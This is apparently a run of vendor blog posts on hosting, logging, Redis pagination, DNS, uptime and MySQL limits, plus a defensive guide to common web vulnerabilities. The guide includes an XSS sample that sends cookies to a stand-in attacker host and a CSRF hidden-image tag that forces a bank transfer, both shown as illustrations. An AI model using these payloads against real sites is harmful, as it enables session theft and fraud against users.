There is no one-size-fits-all solution; it all depends on your requirements, your stack, and your budget. PaaS services are gaining popularity, but they might not be a great solution for developers on a tight budget, or those who don’t need a hosting environment every day. For many freelancers and small, independent developers, VPS is still the way to go. Depending on what you do, an entry-level managed dedicated server is an option, and if you do small turnkey web projects, you may even consider some reseller packages. 

The fact that big hosting companies continue to compete for developers’ business is, ultimately, a good thing. It means they’re forced to roll out timely updates and offer better support across all hosting packages in order to remain competitive. They are not really competing with PaaS and cloud services, but they still want a slice of the pie.

Remember how PaaS providers offer developers various incentives to get on board, just so they could get their business in the long run? It could be argued that conventional hosting companies are trying to do the same by luring novice developers to their platform, hoping that they will be loyal customers and use their servers to host a couple of dozen projects a few years down the road.

The Future Of Hosting

Although the hosting industry may not appear as vibrant and innovative as other tech sectors, this is not entirely fair. Of course, it will always look bland and unexciting compared to some fast-paced sectors, but we’re talking about infrastructure, not some sort of get-rich-quick scheme.

The hosting industry is changing, and it is innovative. It just takes a bit longer to deploy new technology, that’s all. For example, a logistics company probably changes its company smartphones every year or two, but its delivery vehicles aren’t updated nearly as often, yet they’re the backbone of the business.

Let’s take a quick look at some hosting industry trends that are becoming relevant from a software development perspective:

  • Continual development and growth of Cloud and PaaS services.
  • Evolution of managed hosting into quasi-PaaS services.
  • Increasing integration with industry standard tools.
  • New hardware might make dedicated servers cheaper.

Cloud and PaaS services will continue to mature and grow. More importantly, as competition heats up, prices should come down. The possibility of integrating various development tools and features into affordable hosting plans will continue to make them attractive from a financial perspective. Moving up on the price scale, managed hosting could also evolve to encompass some features and services offered by PaaS. If you’re interested in hosting industry trends, I suggest you check out this Forbes compilation of cloud market forecasts for 2015 and beyond.

Dedicated servers will never be cheap, at least not compared to shared and VPS plans. However, they are getting cheaper, and they could get a boost in the form of frugal and inexpensive ARM hardware. ARM-based processors tend to offer superior efficiency compared to x86 processors, yet they are relatively cheap to develop and deploy. Some flagship smartphones ship with quad-core chips, based on 64-bit Cortex-A57 CPU cores, and the same cores are coming to ARM-based server processors.

As a chip geek, I could go on, but we intend to take an in-depth look at the emerging field of ARM servers in one of our upcoming blog posts, so if you’re interested, stay tuned.

This article originally appeared on Toptal at https://www.toptal.com/it/hosting-for-freelance-developers-paas


To try out Morpheus' leading PaaS offering, sign up for a free demo here.

What Is Data Logging?


Data logging is one of the most important parts of most IT pros’ jobs. So, do you know what it is?

 

Data logging is often talked about as a helpful tool that you can use when trying to maintain your various servers, databases, and other systems that go into an application. So, what is data logging and what does it do that helps you maintain your applications more easily?

Data Logging Defined

Generally speaking, data logging is the recording of data over a period of time by a computer system or a special standalone device that can be tailored to a specific use case. The recorded data can then be retrieved and analyzed to help determine whether things ran smoothly during the time the data was being recorded, and to help identify what happened if there were any issues in need of further attention. Standalone data loggers are used in many familiar settings, such as weather stations, traffic monitoring, and wildlife research. These devices make it possible to record data continuously and automatically, without the need for a person to be present with the data logger.

A data logger for a weather station. Source: Wikipedia.

For instance, when performing wildlife research, it can be beneficial to have such automated logging, as wildlife may behave differently when one or more humans are present. For the purposes of application monitoring, data logging records information pertinent to the maintenance of the infrastructure that is required for an application to run.

How Data Logging Helps With App Maintenance

When maintaining apps, it is always helpful to know when and where something went wrong. In many cases, such logging can help you avoid problems by alerting you that an issue may arise soon (a server beginning to respond slowly, for instance). Data logging can also help you keep track of statistics over time, such as the overall uptime, the uptime of specific servers, average response time, and other data that can help you tweak your applications for optimum uptime and performance.
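
As a generic illustration of the idea (this is not Morpheus code; the URL, log file name, and two-second threshold are hypothetical), a simple logger that records response times might look like this:

# Sketch: log response times so slowdowns are recorded before they become outages.
import logging
import time
import urllib.request

logging.basicConfig(
    filename="app-health.log",
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(message)s",
)

def check_endpoint(url="https://app.example.com/health"):
    start = time.time()
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            elapsed = time.time() - start
            if elapsed > 2.0:
                logging.warning("Slow response (%.2fs) from %s", elapsed, url)
            else:
                logging.info("OK (%.2fs, HTTP %d) from %s", elapsed, resp.status, url)
    except Exception as exc:
        logging.error("Check failed for %s: %s", url, exc)

if __name__ == "__main__":
    check_endpoint()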

Morpheus and Monitoring

If you are looking for a monitoring system with excellent data logging and analysis reports, you should give Morpheus a try. With Morpheus, data logging is automatic as you provision servers and apps. Using the available tools, you can monitor the various parts of your system to keep track of uptime, response time, and to be alerted if an issue does arise.

 

 

The Morpheus interface is clean and easy to use. Source: Morpheus.

Morpheus also allows you to provision apps in a single click and provides ease of use for developers with APIs and a CLI. In addition, backups are automatic, and you can have redundancy as needed to avoid potentially long waits for disaster recovery to take place. Sign up for a demo and we'll let you try out Morpheus for free today.


The Good, the Bad, and the Ugly Among Redis Pagination Strategies


If you need to use pagination in your Redis app, there are a couple of strategies you can use to achieve the necessary functionality, each with its own pros and cons. While pagination can be challenging, a quick overview of these techniques should make choosing a method and implementing it a little easier.

 

In Redis, you have a couple of options from which to choose. You can use the SSCAN command or you can use sorted sets. Each of these has their own advantages, so choose the one that works best for your application and its infrastructure.

Using the SSCAN Command

The SSCAN command is part of a group of commands similar to the regular SCAN command. These include:

  • SCAN - Used to iterate over the set of keys in the current database.
  • SSCAN - Used to iterate over elements of sets.
  • HSCAN - Used to iterate over fields of hashes and their associated values.
  • ZSCAN - Used to iterate over elements of sorted sets and their scores.

Example of scan iteration. Source: Redis.

So, while the regular SCAN command iterates over the database keys, the SSCAN command can iterate over elements of sets. By using the returned SSCAN cursor, you could paginate over a Redis set.

The downside is that you need some way to persist the value of the cursor, and if there are concurrent users this could lead to some odd behavior, since the cursor may not be where it is expected. However, this can be useful for applications where traffic to these paginated areas may be lighter.
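
As a rough sketch using the redis-py client (the set name and page size are arbitrary placeholders), SSCAN-based paging looks something like this:

# Sketch: paging through a Redis set with SSCAN. COUNT is only a hint, so page
# sizes are approximate, and the cursor must be persisted between requests.
import redis

r = redis.Redis(host="localhost", port=6379, db=0)

def get_page(cursor=0, page_size=10):
    # Returns (next_cursor, members); a next_cursor of 0 means iteration is done.
    next_cursor, members = r.sscan("products", cursor=cursor, count=page_size)
    return next_cursor, [m.decode() for m in members]

cursor, page = get_page(0)
while True:
    print(page)
    if cursor == 0:
        break
    cursor, page = get_page(cursor)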

Using Sorted Sets

In Redis, sorted sets are a non-repeating collection of strings associated with a score. This score is used to order the set from the smallest to the largest score. This data type allows for fast updating by giving you easy access to elements, even if the elements are in the middle of the set.

An example of sorted set elements. Source: Redis.

To paginate, you can use the ZRANGE command to select a range of elements in a sorted set by rank, where rank is determined by score ordering (ZRANGEBYSCORE selects by score value instead). So you could, for example, select elements 1-20, then 21-40, and so on. By programmatically adjusting the range as the user moves through the data, you can achieve the pagination you need for your application.

Since sorted sets and ZRANGE do this task more intuitively than using a scan, it is often the preferred method of pagination, and is easier to implement with multiple users, since you can programmatically keep track of which ZRANGE each user is selecting at any given time.
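
A minimal redis-py sketch of rank-based paging with ZRANGE might look like the following; the key name and page size are arbitrary placeholders.

# Sketch: fetch page N of a sorted set by rank (members come back lowest score first).
import redis

r = redis.Redis(host="localhost", port=6379, db=0)

def get_page(page, page_size=20):
    start = page * page_size
    stop = start + page_size - 1
    return [m.decode() for m in r.zrange("scores", start, stop)]

# Page 0 returns ranks 0-19, page 1 returns ranks 20-39, and so on, so each
# user's position can be tracked as a simple page number on the application side.
print(get_page(0))
print(get_page(1))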

In the end, you can choose whichever method works for your particular situation. If you have a smaller application with less traffic, a scan may work for you. If, however, you need a more robust solution for larger data sets or more highly utilized applications, it may be best to use ZRANGE with sorted sets to achieve pagination in your application.

Using DNS to Debug Downtime


 

At times, a web app or web site may appear to be down even though the server it runs on is functioning properly. When this happens, it is important to know where the issue resides, as it may be easy to fix or may require a lot of work or contacting others. One possibility when a site is in this state is that the DNS records are out of date and no longer pointing visitors to the proper server for your site or app.

What is DNS?
DNS stands for Domain Name System. It is the system that allows a typical URL, such as http://gomorpheus.com, to point to the server on which the actual web site or app resides. Once a computer finds the DNS information it needs to map a base URL to a server address, it will remember it for a period of time, until its TTL (Time To Live) has been reached.
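
A quick way to confirm what a domain currently resolves to is a few lines of Python; the hostname and expected address below are placeholders for your own values.

# Sketch: compare the address a hostname resolves to against the server you expect.
import socket

HOSTNAME = "gomorpheus.com"       # placeholder
EXPECTED_IP = "203.0.113.100"     # placeholder: the server you believe should answer

resolved_ip = socket.gethostbyname(HOSTNAME)
print(f"{HOSTNAME} resolves to {resolved_ip}")

if resolved_ip != EXPECTED_IP:
    print("DNS is pointing somewhere else: check the DNS record or wait for the TTL to expire.")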

How DNS can contribute to downtime

DNS can contribute to downtime in several ways:

  1. The DNS server has the wrong information stored about the server to which the domain should point. For example, the server is actually at the IP address 203.0.113.100, but the DNS entry has the server at 203.0.113.120. Here, changing the entry to the proper address will fix the situation.
  2. The DNS server is down. In such a case, computers that do not have the DNS information cached cannot reach the DNS server to look up the proper address. This will require getting your DNS server back up and running, or contacting the proper people to do this if it is not your server.
  3. The changes haven’t propagated and updated caches yet. Since computers cache DNS information in the operating system and browser, this could be the case.

If the user is affected by number three above, there are a couple of things to try:

  1. Have the user close the web browser, reopen it, and try again. Browsers have a tendency to cache DNS information, so this may solve the issue.
  2. Have the user clear the DNS cache on their operating system. This can be done from a shell, for example, the commands to do this in Windows and OSX are shown below:

#Windows:
ipconfig /flushdns

#OSX:
sudo killall -HUP mDNSResponder

Examples of clearing the DNS cache


Monitoring with Morpheus

Do you want to be notified when your site or app is having issues? If you are looking for a monitoring system with excellent data logging and analysis reports, you should give Morpheus a try. With Morpheus, data logging is automatic as you provision servers and apps. Using the available tools, you can monitor the various parts of your system to keep track of uptime, response time, and to be alerted if an issue does arise.


The Morpheus interface is clean and easy to use. 

Morpheus allows you to provision apps in a single click, and provides ease of use for developers with APIs and a CLI. In addition, backups are also automatic, and you can have redundancy as needed to avoid potentially long waits for disaster recovery to take place. So, why not register an account or try out Morpheus for free today?

10 Most Common Web Security Vulnerabilities


By Gergely Kalman, Security Specialist at Toptal

For all too many companies, it’s not until after a breach has occurred that web security becomes a priority. During my years working as an IT Security professional, I have seen time and time again how obscure the world of IT Security is to so many of my fellow programmers.

An effective approach to IT security must, by definition, be proactive and defensive. Toward that end, this post is aimed at sparking a security mindset, hopefully injecting the reader with a healthy dose of paranoia.

In particular, this guide focuses on 10 common and significant web security pitfalls to be aware of, including recommendations on how they can be avoided. The focus is on the Top 10 Web Vulnerabilities identified by the Open Web Application Security Project (OWASP), an international, non-profit organization whose goal is to improve software security across the globe.


A little web security primer before we start – authentication and authorization 

When speaking with other programmers and IT professionals, I often encounter confusion regarding the distinction between authorization and authentication. And of course, the fact that the abbreviation auth is often used for both only aggravates this common confusion. This confusion is so common that perhaps the issue should be included in this post as “Common Web Vulnerability Zero”.

So before we proceed, let’s clarify the distinction between these two terms:

  • Authentication: Verifying that a person is (or at least appears to be) a specific user, because they have correctly provided their security credentials (password, answers to security questions, fingerprint scan, etc.).
  • Authorization: Confirming that a particular user has access to a specific resource or is granted permission to perform a particular action.

Stated another way, authentication is knowing who an entity is, while authorization is knowing what a given entity can do. 

Common Mistake #1: Injection flaws

Injection flaws result from a classic failure to filter untrusted input. It can happen when you pass unfiltered data to the SQL server (SQL injection), to the browser (XSS – we’ll talk about this later), to the LDAP server (LDAP injection), or anywhere else. The problem here is that the attacker can inject commands to these entities, resulting in loss of data and hijacking clients’ browsers. 

Anything that your application receives from untrusted sources must be filtered, preferably according to a whitelist. You should almost never use a blacklist, as getting one right is very hard, and blacklists are usually easy to bypass. Antivirus software products typically provide stellar examples of failing blacklists. Pattern matching does not work. 

Prevention: The good news is that protecting against injection is “simply” a matter of filtering your input properly and thinking about whether an input can be trusted. But the bad news is that all input needs to be properly filtered, unless it can unquestionably be trusted (but the saying “never say never” does come to mind here).

In a system with 1,000 inputs, for example, successfully filtering 999 of them is not sufficient, as this still leaves one field that can serve as the Achilles heel that brings down your system. And you might think that putting an SQL query result into another query is a good idea, as the database is trusted, but if the perimeter is not, the input comes indirectly from guys with malintent. This is called Second Order SQL Injection in case you’re interested.

Since filtering is pretty hard to do right (like crypto), what I usually advise is to rely on your framework’s filtering functions: they are proven to work and are thoroughly scrutinized. If you do not use frameworks, you really need to think hard about whether not using them makes sense in your environment. 99% of the time it does not.
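For example, here is a minimal sketch of the difference between concatenating untrusted input into SQL text and letting the database driver bind it as a parameter (Python's built-in sqlite3 module is used purely for illustration; the users table and the sample payload are made up):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

user_input = "alice' OR '1'='1"  # a classic injection attempt

# Vulnerable: the input becomes part of the SQL text itself.
# query = "SELECT * FROM users WHERE name = '" + user_input + "'"

# Safer: the driver binds the value as data, never as SQL.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)  # [] -- the injection attempt matches nothing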

Common Mistake #2: Broken Authentication

This is a collection of multiple problems that can arise from broken authentication handling, and they don’t all stem from the same root cause.

Assuming that anyone still wants to roll their own authentication code in 2014 (what are you thinking??), I advise against it. It is extremely hard to get right, and there are a myriad of possible pitfalls, just to mention a few:

  1. The URL might contain the session id and leak it in the referer header to someone else.
  2. The passwords might not be encrypted either in storage or transit.
  3. The session ids might be predictable, making it trivial to gain access.
  4. Session fixation might be possible.
  5. Session hijacking might be possible if timeouts are not implemented correctly or if HTTP (no SSL/TLS) is used, etc.

Prevention: The most straightforward way to avoid this web security vulnerability is to use a framework. You might be able to implement this correctly yourself, but using a framework is much easier. In case you do want to roll your own code, be extremely paranoid and educate yourself on what the pitfalls are. There are quite a few.
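If you do end up handling sessions yourself, at minimum the session identifiers must be unpredictable. A minimal sketch using Python's standard library secrets module (the cookie attributes mentioned in the comment are the usual hardening flags, not a framework-specific setting):

import secrets

def new_session_id():
    # 32 random bytes from the OS CSPRNG, URL-safe encoded:
    # long enough that guessing or brute-forcing an id is impractical.
    return secrets.token_urlsafe(32)

session_id = new_session_id()
print(session_id)
# When this value is sent to the browser, set it as a cookie with the
# Secure, HttpOnly, and SameSite attributes, and only ever over HTTPS.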

Common Mistake #3: Cross Site Scripting (XSS)

This is a fairly widespread input sanitization failure (essentially a special case of common mistake #1). An attacker gives your web application JavaScript tags on input. When this input is returned to the user unsanitized, the user’s browser will execute it. It can be as simple as crafting a link and persuading a user to click it, or it can be something much more sinister. On page load the script runs and, for example, can be used to post your cookies to the attacker.

Prevention: There’s a simple web security solution: don’t return HTML tags to the client. This has the added benefit of defending against HTML injection, a similar attack whereby the attacker injects plain HTML content (such as images or loud invisible flash players) – not high-impact but surely annoying (“please make it stop!”). Usually, the workaround is simply converting all HTML entities, so that <script> is returned as &lt;script&gt;. The other often-employed method of sanitization is using regular expressions to strip away HTML tags by matching < and >, but this is dangerous, as a lot of browsers will interpret severely broken HTML just fine. Better to convert all characters to their escaped counterparts. 
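As a minimal sketch of that entity conversion (using Python's standard html module; the comment string is a made-up attacker payload):

import html

user_comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Convert the dangerous characters to their HTML entities before rendering.
safe_comment = html.escape(user_comment)
print(safe_comment)
# &lt;script&gt;document.location=&quot;http://evil.example/?c=&quot;+document.cookie&lt;/script&gt;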

Common Mistake #4: Insecure Direct Object References

This is a classic case of trusting user input and paying the price in a resulting security vulnerability. A direct object reference means that an internal object such as a file or database key is exposed to the user. The problem with this is that the attacker can provide this reference and, if authorization is either not enforced (or is broken), the attacker can access or do things that they should be precluded from.

For example, the code has a download.php module that reads and lets the user download files, using a CGI parameter to specify the file name (e.g., download.php?file=something.txt). Either by mistake or due to laziness, the developer omitted authorization from the code. The attacker can now use this to download any system files that the user running PHP has access to, like the application code itself or other data left lying around on the server, like backups. Uh-oh.

Another common vulnerability example is a password reset function that relies on user input to determine whose password we’re resetting. After clicking the valid URL, an attacker can just modify the username field in the URL to say something like “admin”.

Incidentally, both of these examples are things I myself have seen appearing often “in the wild”.

Prevention: Perform user authorization properly and consistently, and whitelist the choices. More often than not though, the whole problem can be avoided by storing data internally and not relying on it being passed from the client via CGI parameters. Session variables in most frameworks are well suited for this purpose.
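One way to avoid handing out direct references at all is to map user-facing identifiers to server-side values, as in this rough sketch (the downloads dictionary, keys, and file paths are all hypothetical):

import os

# Server-side whitelist: opaque keys exposed to the client,
# real file paths kept internal.
DOWNLOADS = {
    "report-2015": "/srv/app/files/annual_report_2015.pdf",
    "brochure": "/srv/app/files/product_brochure.pdf",
}

def resolve_download(requested_key):
    # Unknown keys are rejected outright; the client never supplies a path.
    path = DOWNLOADS.get(requested_key)
    if path is None:
        raise PermissionError("No such download")
    return path

print(os.path.basename(resolve_download("report-2015")))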

Common Mistake #5: Security misconfiguration

In my experience, web servers and applications that have been misconfigured are way more common than those that have been configured properly. Perhaps this is because there is no shortage of ways to screw up. Some examples:

  1. Running the application with debug enabled in production.
  2. Having directory listing enabled on the server, which leaks valuable information.
  3. Running outdated software (think WordPress plugins, old PhpMyAdmin).
  4. Having unnecessary services running on the machine.
  5. Not changing default keys and passwords. (Happens way more frequently than you’d believe!)
  6. Revealing error handling information to the attackers, such as stack traces.

Prevention: Have a good (preferably automated) “build and deploy” process, which can run tests on deploy. The poor man’s security misconfiguration solution is post-commit hooks, to prevent the code from going out with default passwords and/or development stuff built in.
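A very small variation on the “poor man’s” idea is a pre-deploy script that refuses to ship obviously unsafe settings. In this sketch the environment variable names and the list of weak passwords are purely illustrative:

import os
import sys

# Hypothetical settings pulled from the environment at deploy time.
DEBUG = os.environ.get("APP_DEBUG", "false").lower()
DB_PASSWORD = os.environ.get("APP_DB_PASSWORD", "")

problems = []
if DEBUG == "true":
    problems.append("debug mode is enabled")
if DB_PASSWORD in ("", "root", "password", "changeme"):
    problems.append("database password is missing or a known default")

if problems:
    print("Refusing to deploy: " + "; ".join(problems))
    sys.exit(1)
print("Configuration checks passed.")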

Common Mistake #6: Sensitive data exposure

This web security vulnerability is about crypto and resource protection. Sensitive data should be encrypted at all times, including in transit and at rest. No exceptions. Credit card information and user passwords should never travel or be stored unencrypted, and passwords should always be hashed. Obviously the crypto/hashing algorithm must not be a weak one – when in doubt, use AES (256 bits and up) and RSA (2048 bits and up).

And while it goes without saying that session IDs and sensitive data should not be traveling in the URLs and sensitive cookies should have the secure flag on, this is very important and cannot be over-emphasized.

Prevention:

  • In transit: Use HTTPS with a proper certificate and PFS (Perfect Forward Secrecy). Do not accept anything over non-HTTPS connections. Have the secure flag on cookies.
  • In storage: This is harder. First and foremost, you need to lower your exposure. If you don’t need sensitive data, shred it. Data you don’t have can’t be stolen. Do not store credit card information ever, as you probably don’t want to have to deal with being PCI compliant. Sign up with a payment processor such as Stripe or Braintree. Second, if you have sensitive data that you actually do need, store it encrypted and make sure all passwords are hashed. For hashing, use of bcrypt is recommended (a short hashing sketch follows below). If you don’t use bcrypt, educate yourself on salting and rainbow tables.

And at the risk of stating the obvious, do not store the encryption keys next to the protected data. That’s like storing your bike with a lock that has the key in it. Protect your backups with encryption and keep your keys very private. And of course, don’t lose the keys!
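Since the storage bullet above recommends bcrypt, here is a minimal password-hashing sketch (assuming the third-party bcrypt package is installed; if it isn't available, the standard library's hashlib.pbkdf2_hmac with a per-user random salt is a reasonable fallback):

import bcrypt

password = b"correct horse battery staple"

# gensalt() embeds a random salt and a work factor into the resulting hash.
hashed = bcrypt.hashpw(password, bcrypt.gensalt())

# Store only `hashed`; verify later with a constant-time comparison.
print(bcrypt.checkpw(password, hashed))        # True
print(bcrypt.checkpw(b"wrong guess", hashed))  # False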

Common Mistake #7: Missing function level access control

This is simply an authorization failure. It means that when a function is called on the server, proper authorization was not performed. A lot of times, developers rely on the fact that the server side generated the UI, and they think that functionality not supplied by the server cannot be accessed by the client. It is not as simple as that, as an attacker can always forge requests to the “hidden” functionality and will not be deterred by the fact that the UI doesn’t make this functionality easily accessible. Imagine there’s an /admin panel, and the button is only present in the UI if the user is actually an admin. Nothing keeps an attacker from discovering this functionality and misusing it if authorization is missing.

Prevention: On the server side, authorization must always be done. Yes, always. No exceptions; otherwise these vulnerabilities will result in serious problems.
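In practice this usually means one centrally enforced check that every sensitive handler goes through, rather than per-page “the button is hidden” logic. A framework-agnostic sketch (the User class and handler below are made up for illustration):

from functools import wraps

class User:
    def __init__(self, name, roles):
        self.name = name
        self.roles = set(roles)

def require_role(role):
    """Decorator: refuse to run the handler unless the caller has `role`."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(current_user, *args, **kwargs):
            if role not in current_user.roles:
                raise PermissionError(f"{current_user.name} lacks role '{role}'")
            return handler(current_user, *args, **kwargs)
        return wrapper
    return decorator

@require_role("admin")
def delete_account(current_user, account_id):
    return f"account {account_id} deleted by {current_user.name}"

print(delete_account(User("todd", ["admin"]), 42))
# delete_account(User("alice", ["user"]), 42) would raise PermissionError.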

Common Mistake #8: Cross Site Request Forgery (CSRF)

This is a nice example of a confused deputy attack whereby the browser is fooled by some other party into misusing its authority. A 3rd party site, for example, can make the user’s browser misuse its authority to do something for the attacker.

In the case of CSRF, a 3rd party site issues requests to the target site (e.g., your bank) using your browser with your cookies / session. If you are logged in on one tab on your bank’s homepage, for example, and they are vulnerable to this attack, another tab can make your browser misuse its credentials on the attacker’s behalf, resulting in the confused deputy problem. The deputy is the browser that misuses its authority (session cookies) to do something the attacker instructs it to do.

Consider this example:

Attacker Alice wants to lighten target Todd’s wallet by transferring some of his money to her. Todd’s bank is vulnerable to CSRF. To send money, Todd has to access the following URL:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

After this URL is opened, a success page is presented to Todd, and the transfer is done. Alice also knows that Todd frequently visits a site under her control at blog.aliceisawesome.com, where she places the following snippet:

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243" width="0" height="0" />

Upon visiting Alice’s website, Todd’s browser thinks that Alice links to an image, and automatically issues an HTTP GET request to fetch the “picture”, but this actually instructs Todd’s bank to transfer $1500 to Alice.

Incidentally, in addition to demonstrating the CSRF vulnerability, this example also demonstrates altering the server state with an idempotent HTTP GET request, which is itself a serious vulnerability. HTTP GET requests must be idempotent (safe), meaning that they cannot alter the resource which is accessed. Never, ever use methods that are supposed to be idempotent (such as GET) to change the server state.

Fun fact: CSRF is also the method people used for cookie-stuffing in the past until affiliates got wiser.

Prevention: Store a secret token in a hidden form field which is inaccessible from the 3rd party site. You of course always have to verify this hidden field. Some sites ask for your password as well when modifying sensitive settings (like your password reminder email, for example), although I’d suspect this is there to prevent the misuse of your abandoned sessions (in an internet cafe for example).
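A bare-bones sketch of that token dance (standard library only; the session dictionary here stands in for whatever server-side session store you actually use):

import hmac
import secrets

session = {}  # stand-in for a real server-side session store

def issue_csrf_token():
    # Generated per session, embedded in a hidden form field.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def verify_csrf_token(submitted):
    expected = session.get("csrf_token", "")
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(expected, submitted)

form_field = issue_csrf_token()       # rendered into the legitimate form
print(verify_csrf_token(form_field))  # True for the real form post
print(verify_csrf_token("forged"))    # False for a cross-site request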

Common Mistake #9: Using components with known vulnerabilities

The title says it all. I’d again classify this as more of a maintenance/deployment issue. Before incorporating new code, do some research, possibly some auditing. Using code that you got from a random person on GitHub or some forum might be very convenient, but is not without risk of serious web security vulnerability.

I have seen many instances, for example, where sites got owned (i.e., where an outsider gains administrative access to a system), not because the programmers were stupid, but because 3rd party software remained unpatched for years in production. This happens all the time with WordPress plugins, for example. If you think they will not find your hidden phpMyAdmin installation, let me introduce you to dirbuster.

The lesson here is that software development does not end when the application is deployed. There has to be documentation, tests, and plans on how to maintain and keep it updated, especially if it contains 3rd party or open source components.

Prevention:

  • Exercise caution. Beyond obviously using caution when using such components, do not be a copy-paste coder. Carefully inspect the piece of code you are about to put into your software, as it might be broken beyond repair (or in some cases, intentionally malicious).
  • Stay up-to-date. Make sure you are using the latest versions of everything that you trust, and have a plan to update them regularly. At least subscribe to a newsletter of new security vulnerabilities regarding the product.

Common Mistake #10: Unvalidated redirects and forwards

This is once again an input filtering issue. Suppose that the target site has a redirect.php module that takes a URL as a GET parameter. Manipulating the parameter can create a URL on targetsite.com that redirects the browser to malwareinstall.com. When the user sees the link, they will see targetsite.com/blahblahblah, which the user thinks is trusted and safe to click. Little do they know that this will actually transfer them onto a malware drop (or any other malicious) page. Alternatively, the attacker might redirect the browser to targetsite.com/deleteprofile?confirm=1.

It is worth mentioning that stuffing unsanitized user-defined input into an HTTP header might lead to header injection, which is pretty bad.

Prevention: Options include:

  • Don’t do redirects at all (they are seldom necessary).
  • Have a static list of valid locations to redirect to.
  • Whitelist the user-defined parameter, but this can be tricky (a minimal whitelist check is sketched below).
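A rough sketch of the whitelist option (the allowed paths are hypothetical; the point is that the redirect target is chosen from a fixed server-side list and never taken verbatim from the request):

# Fixed, server-side list of legitimate redirect destinations.
ALLOWED_REDIRECTS = {
    "home": "/",
    "account": "/account/settings",
    "help": "/support/faq",
}

def safe_redirect_target(requested_key):
    # Anything not explicitly listed falls back to the home page.
    return ALLOWED_REDIRECTS.get(requested_key, "/")

print(safe_redirect_target("account"))                    # /account/settings
print(safe_redirect_target("http://malwareinstall.com"))  # /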

Epilogue

I hope that I have managed to tickle your brain a little bit with this post and to introduce a healthy dose of paranoia and web security vulnerability awareness.

The core takeaway here is that age-old software practices exist for a reason, and what applied back in the day to buffer overflows still applies to pickled strings in Python today. Security helps you write correct(er) programs, which all programmers should aspire to.

Please use this knowledge responsibly, and don’t test pages without permission!

For more information and more specific attacks, have a look at: https://www.owasp.org/index.php/Category:Attack.

This post originally appeared in the Toptal blog: https://www.toptal.com/security/10-most-common-web-security-vulnerabilities


To see how Morpheus can help you get more out of your MongoDB, sign up for a demo today!

How to Manage App Uptime Like a Boss


Find out how you can more easily manage your app’s uptime.

 

Keeping your apps up and running with a good uptime rate can be a tedious task of monitoring servers, logs, databases, and more. If an incident does occur, you have to go through piece by piece to find out where the problem is – and then work on fixing it. All of this takes precious time away from you and your staff, and increases the amount of time your app is unavailable to users while you find and fix the issue. For example, billions are being spent on election campaigns this year; if something goes down in one of those campaigns, the results can be catastrophic: the difference between sitting in the White House and watching from home.

$4.4 billion is expected to be spent on election campaigns this year. That means managing uptime can be the difference between watching from the White House and watching from home.

 

Average cost of downtime. Source: Disaster Recovery Journal.

Save Time with PaaS

A Platform as a Service (PaaS) can help you organize and streamline your app management, making it far easier for you and your staff to meet uptime requirements and demands. A good example of this is the Morpheus service, which makes locating and reporting on issues quick and simple.

 

The user-friendly Morpheus interface. Source: Morpheus

With Morpheus, you can provision apps and databases in real-time to public, private, and hybrid clouds and spin up databases, apps, environments and more with a few simple clicks. You can use the monitoring service to keep track of overall app uptime and response time, while also tracking the vital statistics for each individual piece of your app.

Keep track of your database server, app server, and any other piece of your app 24/7. With all of this information at your fingertips, you may be able to prevent a number of incidents just by checking into any apps that are responding slower than usual. Being able to fix an issue before there is any outage can certainly ease the burden on you and your staff that downtime brings.

Morpheus also provides automatic logging and backups of your systems. Look through easy-to-use reports on your systems to find out where issues occurred. For backups, you can determine the backup time and frequency to ensure you get the backups you need when you need them. Instead of worrying about whether you have a recent backup, let Morpheus ensure you have one when it is needed most! Downtime is minimized, and you get to keep your peace of mind knowing you can restore from a backup right away.

In addition to all of this, Morpheus takes care of infrastructure, setup, scaling and more, and sends you alerts when your attention is needed, thus giving you more freedom to take care of other business. With all of these features, why not give Morpheus a try today?

"Too Many Connections": How to Increase the MySQL Connection Count To Avoid This Problem


If your MySQL server doesn't allow enough connections, your users will begin to receive a "Too many connections" error while trying to use your service. To fix this, you can increase the maximum number of connections to the database that are allowed, but there are some things to take into consideration before simply ramping up this number.

Items to Consider

Before you increase the connections limit, you will want to ensure that the machine on which the database is housed can handle the additional workload. The maximum number of connections that can be supported depends on the following variables:

  • The available RAM – The system will need to have enough RAM to handle the additional workload.
  • The thread library quality of the platform - This will vary based on the platform. For example, Windows can be limited by the Posix compatibility layer it uses (though the limit no longer applies to MySQL v5.5 and up). However, there remain memory usage concerns depending on the architecture (x86 vs. x64) and how much memory can be consumed per application process. 
  • The required response time - Increasing the number could increase the amount of time it takes to respond to requests. This should be tested to ensure it meets your needs before going into production.
  • The amount of RAM used per connection - Again, RAM is important, so you will need to know if the RAM used per connection will overload the system or not.
  • The workload required for each connection - The workload will also factor in to what system resources are needed to handle the additional connections.

Another issue to consider is that you may also need to increase the open files limit, so that enough file handles are available.

Checking the Connection Limit

To see what the current connection limit is, you can run the following from the MySQL command line or from many of the available MySQL tools such as phpMyAdmin:

 The show variables command.

This will display a nicely formatted result for you:

 Example result of the show variables command.

Increasing the Connection Limit

To increase the global number of connections temporarily, you can run the following from the command line:

 An example of setting the max_connections global.

If you want to make the increase permanent, you will need to edit the my.cnf configuration file. You will need to determine the location of this file for your operating system (Linux systems often store the file in the /etc folder, for example). Open this file and add a line that includes max_connections, followed by an equal sign, followed by the number you want to use, as in the following example:

 Example of setting the max_connections

The next time you restart MySQL, the new setting will take effect and will remain in place unless or until this is changed again.
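For reference, here is a small sketch of the check-and-raise sequence driven from Python (assuming the third-party mysql-connector-python package and an account with sufficient privileges to set global variables; the host, credentials, and the value 500 are placeholders):

import mysql.connector

# Placeholder connection details.
conn = mysql.connector.connect(host="localhost", user="root", password="secret")
cur = conn.cursor()

# Check the current limit.
cur.execute("SHOW VARIABLES LIKE 'max_connections'")
print(cur.fetchone())  # e.g. ('max_connections', '151')

# Raise it until the next restart; make it permanent by adding
# "max_connections = 500" to the [mysqld] section of my.cnf.
cur.execute("SET GLOBAL max_connections = 500")

cur.close()
conn.close()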

Easily Scale a MySQL Database

